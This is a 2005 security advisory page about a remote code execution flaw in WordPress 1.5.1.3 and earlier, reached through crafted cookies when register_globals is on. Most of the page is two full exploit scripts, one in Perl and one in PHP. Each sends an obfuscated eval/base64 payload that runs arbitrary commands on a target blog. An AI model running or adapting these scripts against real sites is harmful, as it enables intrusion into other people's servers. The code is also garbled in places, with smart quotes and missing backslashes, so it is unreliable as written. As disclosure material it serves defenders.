‘WordPress Command Execution Vulnerability (Cache_lastpostdate)’

Published on August 10th, 2005
Summary

A vulnerability in WordPress’s handling of incoming cookie information allows remote attackers to cause the program to execute arbitrary code if the PHP settings of register_globals has been set to On.’

Credit:

‘The information has been provided by Kartoffelguru.’


Details

Vulnerable Systems:
 * WordPress version 1.5.1.3 and prior (with register_globals)

Immune Systems:
 * WordPress version 1.5.1.4 or newer

Perl Exploit:
#!/usr/bin/perl
use strict;
use MIME::Base64 qw(encode_base64 decode_base64);
use IO::Socket;

print ‘WordPress <= 1.5.1.3 – remote code execution 0-DDAAYY exploit (Converted by Noam)n’;
print ‘(C) Copyright 2005 Kartoffelgurunn’;
print ‘[!] info: requires register_globals turned on on target hostnn’;

if (@ARGV < 2)
{
 die (‘usage:nt./wpx.php http://www.xyz.net/blog/ ‘system(‘uname -a;id’);’nn’);
}

my $url = shift;
my $cmd = shift;

if (length($cmd)==0)
{
 $cmd = ‘phpinfo();’;
}

#print ‘code: ‘.encode_base64($cmd, ”).’n’;
my @code = unpack(‘C*’, encode_base64($cmd, ”));
#print ‘code: @coden’;
my $cnv = ”;
for (my $i=0;$i<@code; $i++)
{
 $cnv.= ‘chr(‘.$code[$i].’).’;
}
$cnv.=’chr(32)’;
#print ‘cnv: $cnvn’;

my $str = encode_base64(‘args[0]=eval(base64_decode(‘.$cnv.’)).die()&args[1]=x’, ”);
#print ‘str: [$str]n’;

my $cookie=’wp_filter[query_vars][0][0][function]=get_lastpostdate;’. ‘wp_filter[query_vars][0][0][accepted_args]=0;’;
$cookie.=’wp_filter[query_vars][0][1][function]=base64_decode;’. ‘wp_filter[query_vars][0][1][accepted_args]=1;’;
$cookie.=’cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=’;
$cookie.=$str;
$cookie.=’;wp_filter[query_vars][1][0][function]=parse_str;’. ‘wp_filter[query_vars][1][0][accepted_args]=1;’;
$cookie.=’wp_filter[query_vars][2][0][function]=get_lastpostmodified;’ . ‘wp_filter[query_vars][2][0][accepted_args]=0;’;
$cookie.=’wp_filter[query_vars][3][0][function]=preg_replace;’ . ‘wp_filter[query_vars][3][0][accepted_args]=3;’;

$url =~ /http://([^/]+)/(.*?)/;

my $hostname = $1;

my $path = $2;
my $Request = ‘GET /$path HTTP/1.1r
Host: $hostnamer
Cookie: $cookier
Referer: $hostnamer
Connection: closer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)r
r
‘;

my $socket = IO::Socket::INET->new ( Proto => ‘tcp’, PeerAddr => $hostname, PeerPort => 80);
unless ($socket) { die ‘cannot connect to http daemon on $hostname’ }

print ‘Request: [$Request]n’;
print $socket $Request;

while (<$socket>)
{
 print $_;
}

PHP Exploit:
<?php
    echo ‘WordPress <= 1.5.1.3 – remote code execution 0-DDAAYY exploitn’;
    echo ‘(C) Copyright 2005 Kartoffelgurunn’;
    echo ‘[!] info: requires register_globals turned on on target hostnn’;
    if (!extension_loaded(‘curl’)) {
        die (‘[-] you need the curl extension activated…n’);
    }

    function usage()
    {
        die (‘usage:nt./wpx.php -h http://www.xyz.net/blog/ -c ‘system(‘uname -a;id’);’nn’);
    }

    $options = getopt(‘h:c:’);
    if (count($options) < 1 || !isset($options[‘h’])) {
        usage();
    }

    $host = (is_array($options[‘h’]) ? $options[‘h’][0]:$options[‘h’]);
    $cmd = (is_array($options[‘c’]) ? $options[‘c’][0]:$options[‘c’]);

    if (!preg_match(‘/^http:///’, $host, $dummy)) {
        usage();
    }

    if (strlen(trim($cmd))==0) {
        $cmd = ‘phpinfo();’;
    }

    $code = base64_encode($cmd);
    echo ‘code: $coden’;
    $cnv = ”;
    for ($i=0;$i<strlen($code); $i++) {
        $cnv.= ‘chr(‘.ord($code[$i]).’).’;
    }
    $cnv.=’chr(32)’;
    echo ‘cnv: $cnvn’;

    $str = base64_encode(‘args[0]=eval(base64_decode(‘.$cnv.’)).die()&args[1]=x’);

    $cookie=’wp_filter[query_vars][0][0][function]=get_lastpostdate;’ . ‘wp_filter[query_vars][0][0][accepted_args]=0;’;
    $cookie.=’wp_filter[query_vars][0][1][function]=base64_decode;’ . ‘wp_filter[query_vars][0][1][accepted_args]=1;’;
    $cookie.=’cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=’;
    $cookie.=$str;
    $cookie.=’;wp_filter[query_vars][1][0][function]=parse_str;’ . ‘wp_filter[query_vars][1][0][accepted_args]=1;’;
    $cookie.=’wp_filter[query_vars][2][0][function]=get_lastpostmodified;’ . ‘wp_filter[query_vars][2][0][accepted_args]=0;’;
    $cookie.=’wp_filter[query_vars][3][0][function]=preg_replace;’ . ‘wp_filter[query_vars][3][0][accepted_args]=3;’;

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $host);
    curl_setopt($ch, CURLOPT_POST, 0);
    curl_setopt($ch, CURLOPT_COOKIE, $cookie);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_CURLOPT_REFERER, $host);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, ‘Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)’);
    curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
    echo ‘[+] now executingnn’;

    $r = curl_exec($ch);
    curl_close($ch);

    echo $r;

?>’

Categories: UNIX
Tags:

Related Posts

UNIX

‘ProFTPD Response Pool Use-After-Free Code Execution Vulnerability’

'This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the ProFTPd server.'

UNIX

‘Insight Control for Linux Multiple Vulnerabilities’

'Remote unauthorized elevation of privilege, execution of arbitrary code, encryption downgrade, information disclosure and Denial of Service (DoS) vulnerabilities were identified in Insight Control for Linux.'

UNIX

‘HP-UX Running NFS/ONCplus Denial of Service Vulnerability’

'A potential security vulnerability has been identified with NFS/ONCplus running on HP-UX.'